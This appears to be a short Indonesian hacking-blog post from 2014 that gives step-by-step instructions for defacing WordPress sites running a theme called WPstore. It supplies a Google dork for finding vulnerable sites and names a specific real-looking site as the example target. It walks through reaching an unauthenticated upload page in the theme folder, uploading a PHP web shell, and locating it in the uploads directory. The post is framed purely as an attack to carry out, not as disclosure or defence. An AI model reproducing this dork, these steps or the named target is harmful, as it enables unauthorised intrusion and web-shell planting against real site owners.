Breaking News
Loading...
Wednesday, March 19, 2014

Wordpress Themes WPstore Upload Vulnerability

8:16 AM
Dah lama gak posting nih blog wkwkw :v
saya mau kasih tutorial depes lagi kali ini CMSnya Wordpress
langsung aja
Dork :
inurl:/wp-content/themes/WPstore /inurl:"/?page=store" site:.com
kita ambil contoh: http://www.pgreports.co.uk/?page=store
nah kalo udah kita ctrl+u :v
kita liat wordpress bukan dan themanya apaa :v


http://www.pgreports.co.uk/wp-content/themes/Store/style.css
kita ganti URLnya menjadi
http://www.pgreports.co.uk/wp-content/themes/Store/upload

kalo begitu ada tombol uploadnya langsung aja pilih shell ente
langsung upload shell ada di direktori
http://www.pgreports.co.uk/wp-content/uploads/products_img/shell.php
(Note: not all website are vulnerable in this exploit)

0 comments:

Post a Comment

 
Toggle Footer